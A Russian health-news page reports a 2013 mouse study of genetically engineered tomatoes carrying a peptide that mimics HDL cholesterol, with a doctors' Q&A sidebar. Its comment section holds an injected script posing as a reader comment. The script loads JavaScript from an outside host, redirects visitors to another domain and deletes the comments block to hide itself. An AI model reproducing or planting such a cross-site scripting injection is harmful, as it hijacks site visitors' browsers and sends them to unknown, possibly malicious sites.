Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  ГМО-помидоры спасают от а...  >>  ГМО-помидоры спасают от атеросклероза
 
Обратная связь
 

ГМО-помидоры спасают от атеросклероза

Размер шрифта
08 января 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые обнаружили, что ГМО-помидоры содержат пептид, который по своему действию похож на «хороший» холестерин.

томаты ГМО

С помощью генной инженерии американские ученые получили ГМО-помидоры, содержащие пептид, который обладает точно таким же действием, как основной компонент «хорошего» холестерина (холестерина липопротеидов высокой плотности). Ученые накормили этими помидорами мышей, которые употребляли пищу с высоким содержанием жиров. Организм мышей не мог избавиться от «плохого» холестерина (холестерина липопротеидов низкой плотности), что вело к развитию воспаления и атеросклероза.

У мышей, которых кормили ГМО-помидорами, уменьшилось воспаление, повысился уровень «хорошего» холестерина, замедлился процесс формирования атеросклеротических бляшек и снизился риск развития сердечно-сосудистых заболеваний и рака.

«Мы нашли новый способ получения пептида, который действует так же, как основной компонент «хорошего» холестерина. Однако этот пептид в несколько раз эффективнее, и он может попасть в организм в составе помидора», – поясняет один из авторов исследования Алан Фогельман из Калифорнийского университета в Лос-Анджелесе. 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Супереда против солнечных ожогов   Лучшие фрукты для похудения и не только   Сладкая парочка против рака простаты! Соя + помидор!   3 продукта для иммунитета  

Слайдшоу

1
Как хранить еду, чтобы тратить меньше денег Еда для плоского живота. Часть 2
Лучшая еда для женщин. Часть 2 Что есть, чтобы не стареть?!
Что съесть в Новый год, чтобы выглядеть моложе Какая еда полезнее в сваренном виде
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.